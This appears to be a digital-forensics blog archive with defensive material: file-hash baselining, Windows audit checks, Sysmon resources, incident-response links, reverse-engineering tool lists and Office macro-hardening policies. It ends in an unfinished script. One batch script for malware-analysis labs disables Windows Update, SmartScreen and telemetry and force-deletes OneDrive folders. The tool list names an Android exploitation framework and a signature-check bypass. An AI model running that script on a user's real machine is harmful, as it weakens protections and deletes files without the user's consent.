DFIR: computing file hashes recursively in Windows

13 August 2018



current folder: dir | Get-FileHash

current folder and subfolders: dir -recurse | Get-FileHash

exclude *.log files: dir -recurse -exclude *.log | Get-FileHash

Note, default hashing algorithm is SHA256. You can use any of: MD5, SHA1, SHA256 (default), SHA384, SHA512, MACTripleDES, RIPEMD160:

dir -recurse -exclude *.log | Get-FileHash -Algorithm SHA512

more details: Get-Help Get-FileHash

current folder and subfolders, with long paths wrapped instead of truncated in the output: dir -recurse | Get-FileHash | Format-Table -Wrap
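The same Get-FileHash pipeline turned into a baseline-and-compare script, so a second run reports files that were added, removed or modified since the baseline. This is an added example, not code from the original post; the folder and baseline paths are placeholders.

```powershell
# Added example (not from the original post): recursive SHA256 baseline of a folder,
# and on later runs a report of added / removed / modified files.
# Assumptions: $Path and $Baseline are placeholders; save as Compare-Baseline.ps1.
param(
    [string]$Path      = 'C:\Evidence',                 # assumed folder to baseline
    [string]$Baseline  = 'C:\Baselines\evidence.csv',   # assumed baseline CSV (keep it outside $Path)
    [string[]]$Exclude = @('*.log'),                    # same exclusion as in the post
    [string]$Algorithm = 'SHA256'                       # Get-FileHash default; SHA512 works too
)

function Get-TreeHashes {
    param([string]$Root, [string[]]$Exclude, [string]$Algorithm)
    $Root = (Resolve-Path -Path $Root).Path.TrimEnd('\')
    Get-ChildItem -Path $Root -Recurse -File -Exclude $Exclude |
        Get-FileHash -Algorithm $Algorithm |
        ForEach-Object {
            # Store paths relative to the root so the baseline survives a folder move.
            [pscustomobject]@{
                RelativePath = $_.Path.Substring($Root.Length + 1)
                Algorithm    = $_.Algorithm
                Hash         = $_.Hash
            }
        }
}

function Compare-TreeHashes {
    param([object[]]$Old, [object[]]$New)
    $oldMap = @{}; foreach ($e in $Old) { $oldMap[$e.RelativePath] = $e.Hash }
    $newMap = @{}; foreach ($e in $New) { $newMap[$e.RelativePath] = $e.Hash }
    foreach ($k in $newMap.Keys) {
        if (-not $oldMap.ContainsKey($k)) {
            [pscustomobject]@{ Change = 'Added';    Path = $k }
        } elseif ($oldMap[$k] -ne $newMap[$k]) {
            [pscustomobject]@{ Change = 'Modified'; Path = $k }
        }
    }
    foreach ($k in $oldMap.Keys) {
        if (-not $newMap.ContainsKey($k)) {
            [pscustomobject]@{ Change = 'Removed';  Path = $k }
        }
    }
}

$current = @(Get-TreeHashes -Root $Path -Exclude $Exclude -Algorithm $Algorithm)
if (Test-Path -Path $Baseline) {
    $previous = @(Import-Csv -Path $Baseline)
    $diff = @(Compare-TreeHashes -Old $previous -New $current)
    if ($diff.Count -gt 0) { $diff | Sort-Object Change, Path | Format-Table -AutoSize -Wrap }
    else { "No changes since baseline ($($current.Count) files checked)." }
} else {
    $null = New-Item -ItemType Directory -Path (Split-Path -Path $Baseline -Parent) -Force
    $current | Export-Csv -Path $Baseline -NoTypeInformation
    "Baseline written to $Baseline ($($current.Count) files)."
}
```

Hash the baseline CSV itself (or store it on write-once media) so that a tampered baseline cannot hide a modified file.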

Audit Windows Infrastructure

10 June 2018

The WINspect script provides the following audit checks and enumeration:

  • Checking for installed security products.
  • Checking for DLL hijackability (Authenticated Users security context).
  • Checking for User Account Control settings.
  • Checking for unattended installs leftovers.
  • Enumerating world-exposed local filesystem shares.
  • Enumerating domain users and groups with local group membership.
  • Enumerating registry autoruns.
  • Enumerating local services that are configurable by Authenticated Users group members.
  • Enumerating local services for which corresponding binary is writable by Authenticated Users group members.
  • Enumerating non-system32 Windows Hosted Services and their associated DLLs.
  • Enumerating local services with unquoted path vulnerability.
  • Enumerating non-system scheduled tasks.

https://github.com/A-mIn3/WINspect

https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/
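One of the checks in that list, services with an unquoted binary path, as a stand-alone PowerShell function with the remediation noted. This is an added example, not WINspect's own code.

```powershell
# Added example (not WINspect's code): find services whose binary path is unquoted and
# contains a space, which is what WINspect reports as the "unquoted path vulnerability".
function Test-UnquotedServicePath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $false }
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return $false }     # already quoted: fine
    # Isolate the executable part (up to and including ".exe"); arguments after it
    # may legitimately contain spaces and are not the problem.
    $m = [regex]::Match($p, '^(.*?\.exe)', [System.Text.RegularExpressions.RegexOptions]::IgnoreCase)
    $exe = if ($m.Success) { $m.Groups[1].Value } else { $p }
    return $exe.Contains(' ')
}

function Get-UnquotedServices {
    # Win32_Service covers user-mode services only, which is what this check targets.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { Test-UnquotedServicePath -PathName $_.PathName } |
        Select-Object Name, StartMode, StartName, PathName
}

# Remediation is to quote the path. Use sc.exe explicitly: in PowerShell "sc" is an alias for Set-Content.
#   sc.exe config <ServiceName> binPath= "\"C:\Program Files\Vendor\service.exe\" -arg"
Get-UnquotedServices | Format-Table -AutoSize -Wrap
```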

Silencing Windows 10 for malware analysis

9 May 2018

REM *** stop telemetry, search and update services ***
sc stop DiagTrack
sc stop diagnosticshub.standardcollector.service
sc stop dmwappushservice
sc stop WMPNetworkSvc
sc stop WSearch
sc stop wuauserv

REM *** keep them from starting again ***
sc config DiagTrack start= disabled
sc config diagnosticshub.standardcollector.service start= disabled
sc config dmwappushservice start= disabled
sc config WMPNetworkSvc start= disabled
sc config WSearch start= disabled
sc config wuauserv start= disabled

REM *** disable telemetry, CEIP and Office telemetry scheduled tasks ***
schtasks /Change /TN "Microsoft\Windows\AppID\SmartScreenSpecific" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\ProgramDataUpdater" /Disable
schtasks /Change /TN "Microsoft\Windows\Application Experience\StartupAppTask" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Consolidator" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\UsbCeip" /Disable
schtasks /Change /TN "Microsoft\Windows\Customer Experience Improvement Program\Uploader" /Disable
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyUpload" /Disable
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentLogOn" /Disable
schtasks /Change /TN "Microsoft\Office\OfficeTelemetryAgentFallBack" /Disable
schtasks /Change /TN "Microsoft\Office\Office 15 Subscription Heartbeat" /Disable

REM *** disable remaining diagnostic and automatic app update tasks ***
schtasks /Change /TN "Microsoft\Windows\Autochk\Proxy" /Disable
schtasks /Change /TN "Microsoft\Windows\CloudExperienceHost\CreateObjectTask" /Disable
schtasks /Change /TN "Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector" /Disable
schtasks /Change /TN "Microsoft\Windows\WindowsUpdate\Automatic App Update" /Disable

REM *** Telemetry and Data Collection ***
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Device Metadata" /v PreventDeviceMetadataFromNetwork /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v DontOfferThroughWUAU /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\SQMClient\Windows" /v "CEIPEnable" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "AITEnable" /t REG_DWORD /d 0 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\SQMLogger" /v "Start" /t REG_DWORD /d 0 /f

REM *** per-user settings: advertising ID, web content evaluation, Accept-Language opt-out ***
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v Enabled /t REG_DWORD /d 0 /f
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v EnableWebContentEvaluation /t REG_DWORD /d 0 /f
reg add "HKCU\Control Panel\International\User Profile" /v HttpAcceptLanguageOptOut /t REG_DWORD /d 1 /f

REM *** Windows Update: no automatic download/install, no peer-to-peer delivery ***
reg add "HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings" /v UxOption /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config" /v DODownloadMode /t REG_DWORD /d 0 /f
REM (the original had a trailing space inside the AU key name, which would create a separate "AU " key; fixed)
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /f /v AUOptions /t reg_dword /d 2
reg add HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /f /v ScheduledInstallDay /t reg_dword /d 0

REM *** Explorer: always show file extensions (hidden-file options left commented out) ***
REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 1 /f
REM reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ShowSuperHidden" /t REG_DWORD /d 1 /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d 0 /f

REM *** remove OneDrive ***
start /wait "" "%SYSTEMROOT%\SYSWOW64\ONEDRIVESETUP.EXE" /UNINSTALL
rd C:\OneDriveTemp /Q /S >NUL 2>&1
rd "%USERPROFILE%\OneDrive" /Q /S >NUL 2>&1
rd "%LOCALAPPDATA%\Microsoft\OneDrive" /Q /S >NUL 2>&1
rd "%PROGRAMDATA%\Microsoft OneDrive" /Q /S >NUL 2>&1
reg add "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1
reg add "HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\ShellFolder" /f /v Attributes /t REG_DWORD /d 0 >NUL 2>&1
start /wait TASKKILL /F /IM explorer.exe
start explorer.exe
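A verification script for the end state the batch file above is meant to produce: every listed service disabled, the scheduled tasks disabled, and the key registry values set. This is an added example, not from the original post; the service, task and value names are the ones the post uses.

```powershell
# Added example (not from the original post): confirm the services, scheduled tasks and
# registry values changed above are in the expected state. Names come from the post itself.
$services = 'DiagTrack', 'diagnosticshub.standardcollector.service', 'dmwappushservice',
            'WMPNetworkSvc', 'WSearch', 'wuauserv'

$tasks = '\Microsoft\Windows\AppID\SmartScreenSpecific',
         '\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser',
         '\Microsoft\Windows\Customer Experience Improvement Program\Consolidator',
         '\Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask',
         '\Microsoft\Windows\WindowsUpdate\Automatic App Update'

$registry = @(
    @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection';   Name = 'AllowTelemetry'; Expected = 0 },
    @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU'; Name = 'NoAutoUpdate';   Expected = 1 },
    @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config'; Name = 'DODownloadMode'; Expected = 0 }
)

function Test-SilencedServices {
    foreach ($name in $services) {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Item   = "service $name"
            Actual = if ($svc) { "$($svc.Status)/$($svc.StartType)" } else { 'not present' }
            Status = if (-not $svc) { 'N/A' } elseif ($svc.StartType -eq 'Disabled') { 'OK' } else { 'NOT DISABLED' }
        }
    }
}

function Test-SilencedTasks {
    foreach ($t in $tasks) {
        # Get-ScheduledTask takes the folder (with trailing backslash) and the task name separately.
        $dir  = (Split-Path -Path $t -Parent).TrimEnd('\') + '\'
        $leaf = Split-Path -Path $t -Leaf
        $task = Get-ScheduledTask -TaskPath $dir -TaskName $leaf -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Item   = "task $t"
            Actual = if ($task) { $task.State } else { 'not present' }
            Status = if (-not $task) { 'N/A' } elseif ($task.State -eq 'Disabled') { 'OK' } else { 'NOT DISABLED' }
        }
    }
}

function Test-SilencedRegistry {
    foreach ($r in $registry) {
        $item   = Get-ItemProperty -Path $r.Key -Name $r.Name -ErrorAction SilentlyContinue
        $actual = if ($item) { $item.($r.Name) } else { $null }
        [pscustomobject]@{
            Item   = "reg $($r.Key)\$($r.Name)"
            Actual = if ($null -eq $actual) { 'not set' } else { $actual }
            Status = if ($actual -eq $r.Expected) { 'OK' } else { 'MISMATCH' }
        }
    }
}

@(Test-SilencedServices) + @(Test-SilencedTasks) + @(Test-SilencedRegistry) | Format-Table -AutoSize -Wrap
```

Run it from an elevated PowerShell after a reboot, since a stopped-but-not-disabled service only shows up once the system has had a chance to start it again.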

 

 

Blocklists of Suspected Malicious IPs and URLs

18 March 2018

source: https://zeltser.com/malicious-ip-blocklists/

 

Sysmon - DFIR

source https://github.com/MHaggis/sysmon-dfir | 10 February 2018


A curated list of resources for learning about deploying, managing and hunting with Microsoft Sysmon. Contains presentations, deployment methods, configuration file examples, blogs and additional github repositories.

Sysmon Learning Resources

General

Sysmon Configuration

@SwiftOnSecurity config

Recommended.

Config will assist with bringing you up to speed in relation to critical process monitoring, network utilization, and so on. Note that the concept is to not log everything, but the most important items.

https://github.com/SwiftOnSecurity/sysmon-config

Sysmon_config.xml

Solid, detailed config. Probably one of the best ones out there in relation to completeness.

MalwareArchaeology

Sysmon-a.cfg

Basic config that will monitor critical Windows process execution. Very basic, but a good config to get used to sysmon and how things operate.

Blog post by blacklanternsecurity

Sysmon-b.cfg

Crypsis Group published config and PDF. Fairly detailed list of excludes that should assist with understanding how they work and get a configuration started.

Crypsis Group Config

Crypsis Group PDF

Sysmon-c.cfg

Great configuration to understand excludes and contains.

Decent Security Config

Sysmon-d.cfg

Solid blog post related to getting started with Sysmon. Config is nicely laid out and easy to understand.

909Research Blog

Sysmon-e.cfg

Config is specific but it provides a good foundation for capturing a lot of specific data.

https://github.com/Prevenity/sysmon

(Comments translated to English)

StartLogging.xml

Provided by https://github.com/VVard0g - Roberto Rodriguez

https://gist.github.com/VVard0g/136481552d8845e52962534d1a4b8664

Sysmoncfg_v2|31.xml

Related material from Splunking the Endpoint .conf talk by James Brodsky and Dimitri McKay.

Splunking the Endpoint - Files from presentation

Configs are optimized for Splunk.

Additional configs

Configs are updated frequently.

SwiftOnSecurity Fork by Ion-Storm

Server Config: https://gist.github.com/Neo23x0/a4b4af9481e01e749409

Client config: https://gist.github.com/Neo23x0/f56bea38d95040b70cf5

Incident Response Playbook

10 December 2017

Incident sources

  • Any attacks affecting critical assets
  • Denial-of-Service attacks that isolate or impede critical service or network performance
  • Malicious logic (virus) attacks that isolate enclaves
  • Administrator/root-level access obtained by unauthorized personnel

  • Significant trends suspected in incidents or events
  • Indication of multiple suspected systems
  • Suspected e-mail spoofing
  • Unauthorized probes or scans of the network

  • Unusual system performance or behavior
  • Unplanned system crashes, outages, or configuration changes
  • Suspicious files identified on a server
  • Missing data, files, or programs
  • Unexplained access privilege changes
  • Poor security practices
  • Unusual after-hours system activity
  • Simultaneous logins by the same user from different IP addresses
  • Unauthorized activity by privileged users

  • System compromise, internal
  • System compromise, cloud
  • Theft of confidential information
  • Theft or loss of mobile device/media
  • Malware
  • Phishing


Incident response playbooks with flow

  • https://www.incidentresponse.com/playbooks/malware-outbreak
  • https://www.incidentresponse.com/playbooks/phishing
  • https://www.incidentresponse.com/playbooks/data-theft
  • https://www.incidentresponse.com/playbooks/virus-outbreak
  • https://www.incidentresponse.com/playbooks/ddos
  • https://www.incidentresponse.com/playbooks/unauthorized-access
  • https://www.incidentresponse.com/playbooks/elevation-of-privilege
  • https://www.incidentresponse.com/playbooks/root-access
  • https://www.incidentresponse.com/playbooks/improper-computer-usage

Handbook

  • http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf
  • https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901
  • https://resources.sei.cmu.edu/asset_files/Handbook/2003_002_001_14102.pdf
  • https://www.nasa.gov/pdf/589502main_ITS-HBK-2810.09-02%20%5BNASA%20Information%20Security%20Incident%20Management%5D.pdf
  • https://www.cybersecuritycoalition.be/content/uploads/cybersecurity-incident-management-guide-EN.pdf

Other resources

  • https://www.crest-approved.org/wp-content/uploads/2014/11/CSIR-Procurement-Guide.pdf
  • https://www.it-cube.net/wp-content/uploads/2017/09/Exabeam_Incident_Response_for_Top_3_Security_Scenarios.pdf

.Net Obfuscation

10 August 2016

http://www.ssware.com/cryptoobfuscator/obfuscator-net.htm

not ethical: ! https://www.youtube.com/watch?v=Gq6hLf3uq3k

sample of security by obscurity!

Deobfuscation Tools

8 August 2016

A curated list of awesome deobfuscation tools for reverse engineers.

 

1. Balbuzard

Balbuzard is a package of malware analysis tools in python to extract patterns of interest from suspicious files (IP addresses, domain names, known file headers, interesting strings, etc). It can also crack malware obfuscation such as XOR, ROL, etc by bruteforcing and checking for those patterns.

2. de4dot

de4dot is an open source (GPLv3) .NET deobfuscator and unpacker written in C#. It will try its best to restore a packed and obfuscated assembly to almost the original assembly. Most of the obfuscation can be completely restored (e.g. string encryption), but symbol renaming is impossible to restore since the original names aren’t (usually) part of the obfuscated assembly. It uses dnlib to read and write assemblies, so make sure you get it or it won’t compile.

3. FLOSS

FireEye Labs Obfuscated String Solver (FLOSS) uses advanced static analysis techniques to automatically deobfuscate strings from malware binaries.

4. iheartxor

iheartxor can be used to bruteforce XOR-encoded strings within a user-defined regular expression pattern (-r). The default search pattern is a regular expression that searches for data between null bytes (‘\x00’). The tool can also be used to do a straight XOR on a file with -f file.name -k value. The value must be between 0x0-0x255.

5. NoMoreXOR

NoMoreXOR helps guess a file's 256-byte XOR key by using frequency analysis.

6. PackerAttacker

The Packer Attacker is a generic hidden code extractor for Windows malware. It supports the following types of packers: running from heap, replacing PE header, injecting in a process.

7. unpacker

unpacker is an automated malware unpacker for Windows malware based on WinAppDbg.

8. unxor

unxor will search through an XOR-encoded file (binary, text-file, whatever) and use known-plaintext attacks to deduce the original keystream. Works on keys half as long as the known-plaintext, in linear complexity.

9. VirtualDeobfuscator

VirtualDeobfuscator is a reverse engineering tool for virtualization wrappers. The goal of the Virtual Deobfuscator is to analyze a runtrace and filter out the VM processing instructions, leaving a reverse engineer with a bytecode version of the original binary.

10. XORBruteForcer

XORBruteForcer is a python script that implements XOR bruteforcing of a given file, although a specific key can be used too. It’s possible to look for a word in the XORed result, minimizing the output.

11. XORSearch

XORSearch is a program to search for a given string in an XOR, ROL, ROT or SHIFT encoded binary file. XORSearch will try all XOR keys (0 to 255), ROL keys (1 to 7), ROT keys (1 to 25) and SHIFT keys (1 to 7) when searching.

12. XORStrings

XORStrings will search for strings in the (binary) file you provide it, using the same encodings as XORSearch (XOR, ROL, ROT and SHIFT). For every encoding/key, XORStrings will search for strings and report the number of strings found, the average string length and the maximum string length.

13. xortool

xortool is a python script that will attempt to guess the XOR key length (based on count of equal chars), as well as the key itself (based on knowledge of most frequent char).

 

source: https://hackerlists.com/deobfuscation-tools/

Android Reverse Engineering Tools

8 August 2016

A curated list of awesome Android reverse engineering tools.

Be sure to check out our list of IDA Pro alternatives and best deobfuscation tools, too.

1. Smali/Baksmali

smali/baksmali is an assembler/disassembler for the dex format used by dalvik, Android’s Java VM implementation. The syntax is loosely based on Jasmin’s/dedexer’s syntax, and supports the full functionality of the dex format (annotations, debug info, line info, etc.)

2. AndBug

AndBug is a debugger targeting the Android platform’s Dalvik virtual machine intended for reverse engineers and developers. It uses the same interfaces as Android’s Eclipse debugging plugin, the Java Debug Wire Protocol (JDWP) and Dalvik Debug Monitor (DDM) to permit users to hook Dalvik methods, examine process state, and even perform changes.

Unlike Google’s own Android Software Development Kit debugging tools, AndBug does not require or expect source code. It does, however, require that you have some level of comfort with Python, as it uses a concept of scripted breakpoints, called “hooks”, for most nontrivial tasks.

3. Androguard

Androguard is a full python tool to play with Android files.

  • DEX, ODEX
  • APK
  • Android’s binary xml
  • Android resources
  • Disassemble DEX/ODEX bytecodes
  • Decompiler for DEX/ODEX files

4. Apktool

A tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes it possible to debug smali code step by step. It also makes working with an app easier because of the project-like file structure and automation of some repetitive tasks like building the apk, etc.

Features:

  • Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

5. Android Framework for Exploitation

Android Framework for Exploitation is a framework for exploiting Android-based devices and applications.

6. Bypass signature and permission checks for IPCs

This tool leverages Cydia Substrate to bypass signature and permission checks for IPCs.

7. Android OpenDebug

This tool leverages Cydia Substrate to make all applications running on the device debuggable; once installed any application will let a debugger attach to them.

8. Dare

Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techniques developed for traditional Java applications.

9. Dex2Jar

Tools to work with Android .dex and Java .class files.

10. Enjarify

Enjarify is a tool for translating Dalvik bytecode to equivalent Java bytecode. This allows Java analysis tools to analyze Android applications.

11. Dedexer

Dedexer is a disassembler tool for DEX files. DEX is a format introduced by the creators of the Android platform. The format and the associated opcode set are in a distant relationship with the Java class file format and Java bytecodes. Dedexer is able to read the DEX format and turn it into an “assembly-like format”. This format was largely influenced by the Jasmin syntax but contains Dalvik opcodes. For this reason, Jasmin is not able to compile the generated files.

12. Fino

An Android Dynamic Analysis Tool.

13. Indroid

The aim of the project is to demonstrate that a simple debugging functionality on *nix systems a.k.a ptrace() can be abused by malware to inject malicious code in remote processes. Indroid provides CreateRemoteThread() equivalent for ARM based *nix devices.

If you want to get a deeper insight into the working of the framework you may:

14. IntentSniffer

Intent Sniffer is a tool that can be used on any device using the Google Android operating system (OS). On the Android OS, an Intent is a description of an action to be performed, such as startService to start a service. The Intent Sniffer tool monitors runtime-routed broadcast Intents. It does not see explicit broadcast Intents, but defaults to (mostly) unprivileged broadcasts. There is an option to see recent tasks' Intents (GET_TASKS), as an Activity’s intents are visible when started. The tool can also dynamically update Actions & Categories.

15. Introspy

Blackbox tool to help understand what an Android application is doing at runtime and assist in the identification of potential security issues.

16. JAD

Jad is a Java decompiler.

17. JD-GUI

JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code with the JD-GUI for instant access to methods and fields.

18. CFR

CFR will decompile modern Java features – Java 8 lambdas (pre and post Java beta 103 changes), Java 7 String switches etc, but is written entirely in Java 6.

19. Krakatau

Krakatau currently contains three tools – a decompiler and disassembler for Java classfiles and an assembler to create classfiles.

20. Procyon

While still incomplete, tests seem to indicate that the Procyon decompiler can generally hold its own against the other leading Java decompilers out there.

21. FernFlower

Fernflower is the first actually working analytical decompiler for Java.

22. Redexer

Redexer is a reengineering tool that manipulates Android app binaries. This tool is able to parse a DEX file into an in-memory data structure; to infer with which parameters the app uses certain permissions (we name this feature RefineDroid); to modify and unparse that data structure to produce an output DEX file (we name these features Dr. Android, which stands for Dalvik Rewriting for Android).

23. Simplify Android deobfuscator

Simplify virtually executes an app to understand its behavior and then tries to optimize the code so that it behaves identically but is easier for a human to understand. Each optimization type is simple and generic, so it doesn’t matter what specific type of obfuscation is used.

24. Bytecode viewer

Bytecode Viewer is an Advanced Lightweight Java Bytecode Viewer, GUI Java Decompiler, GUI Bytecode Editor, GUI Smali, GUI Baksmali, GUI APK Editor, GUI Dex Editor, GUI APK Decompiler, GUI DEX Decompiler, GUI Procyon Java Decompiler, GUI Krakatau, GUI CFR Java Decompiler, GUI FernFlower Java Decompiler, GUI DEX2Jar, GUI Jar2DEX, GUI Jar-Jar, Hex Viewer, Code Searcher, Debugger and more.

It’s written completely in Java, and it’s open sourced. It’s currently being maintained and developed by Konloch.

There is also a plugin system that will allow you to interact with the loaded classfiles, for example you can write a String deobfuscator, a malicious code searcher, or something else you can think of.

You can either use one of the pre-written plugins, or write your own. It supports groovy scripting. Once a plugin is activated, it will execute the plugin with a ClassNode ArrayList of every single class loaded in BCV, this allows the user to handle it completely using ASM.

25. Radare2

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.

Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for reversing apks, analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers, etc…

 

source: https://hackerlists.com/android-reverse-engineering-tools/

decompile / bug bounty of manufacturer firmware

13 March 2016

VirtualBox DKMS problem after reinstallation

9 March 2016

sudo apt-get install dkms --reinstall

sudo apt-get --reinstall install virtualbox-dkms

sudo systemctl start vboxweb.service

---------------------- vboxweb.service ----------

[Unit]
Description=VirtualBox Web Service
After=network.target

[Service]
Type=forking
PIDFile=/run/vboxweb/vboxweb.pid
# Creates /run/vboxweb owned by User=/Group= below; without it the unprivileged vbox user cannot write the pid file.
RuntimeDirectory=vboxweb
ExecStart=/usr/bin/vboxwebsrv --pidfile /run/vboxweb/vboxweb.pid --background
User=vbox
Group=vboxusers

[Install]
WantedBy=multi-user.target

--------------------

sudo mkdir /var/lib/vbox

sudo chown vbox:vboxusers /var/lib/vbox

 

 

 

Windows GPO (local and domain) for Office 2013

8 March 2016

Administrative templates:

32-bit (11.2 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_32bit.exe
64-bit (11.4 MB): https://download.microsoft.com/download/5/8/C/58CA3974-1640-4CFC-A991-3904B3B8939C/admintemplates_64bit.exe

Extract the package and locate the .admx files.

Local workstation:

  • move the .admx files to C:\Windows\PolicyDefinitions
  • move the .adml files to C:\Windows\PolicyDefinitions\en-US

Domain controller:

  • move the .admx files to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions
  • move the .adml files to C:\Windows\SYSVOL\domain\Policies\PolicyDefinitions\en-US

Run gpedit.msc

Most important settings

Each GPO path is followed by its settings as "setting: value", with the sub-option in parentheses where one applies.

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center
  • Trust Access to Visual Basic Project: Disabled
  • VBA Macro Notification Settings: Enabled (Disable all without notification)

User Configuration\Policies\Administrative Templates\Microsoft Excel 2013\Excel Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings
  • Automation Security: Enabled (Set the Automation Security Level: Use application macro security level)

User Configuration\Policies\Administrative Templates\Microsoft Office 2013\Security Settings\Trust Center
  • Allow mix of policy and user locations: Disabled

User Configuration\Policies\Administrative Templates\Microsoft Outlook 2013\Security\Trust Center
  • Apply macro security settings to macros, add-ins and additional actions: Enabled
  • Security setting for macros: Enabled (Security Level: Never warn, disable all)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center
  • Trust Access to Visual Basic Project: Disabled
  • VBA Macro Notification Settings: Enabled (Disable all without notification)

User Configuration\Policies\Administrative Templates\Microsoft PowerPoint 2013\PowerPoint Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center
  • Trust Access to Visual Basic Project: Disabled
  • VBA Macro Notification Settings: Enabled (Disable all without notification)

User Configuration\Policies\Administrative Templates\Microsoft Word 2013\Word Options\Security\Trust Center\Trusted Locations
  • Allow Trusted Locations on the network: Disabled
  • Disable all trusted locations: Enabled
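A way to confirm on a workstation that the macro settings above actually applied, by reading the per-user policy registry values they write. This is an added example, not from the original post; the key and value names are the Office 2013 (15.0) policy registry locations as I know them from the ADMX files, which is an assumption to confirm against the .admx you extracted.

```powershell
# Added example (not from the original post): audit the per-user policy registry values
# that the macro-related GPOs above write.
# Assumption: these are the Office 2013 (15.0) policy registry locations from the ADMX
# files; confirm them against the extracted .admx before relying on this.
$office = 'HKCU:\Software\Policies\Microsoft\Office\15.0'

$checks = @(
    foreach ($app in 'Excel', 'PowerPoint', 'Word') {
        $sec = "$office\$app\Security"
        # VBAWarnings 4 = "Disable all without notification"; AccessVBOM 0 = trust access disabled
        [pscustomobject]@{ Setting = "$app - VBA Macro Notification Settings";       Key = $sec;                     Name = 'VBAWarnings';           Expected = 4 }
        [pscustomobject]@{ Setting = "$app - Trust Access to Visual Basic Project";   Key = $sec;                     Name = 'AccessVBOM';            Expected = 0 }
        [pscustomobject]@{ Setting = "$app - Disable all trusted locations";          Key = "$sec\Trusted Locations"; Name = 'AllLocationsDisabled';  Expected = 1 }
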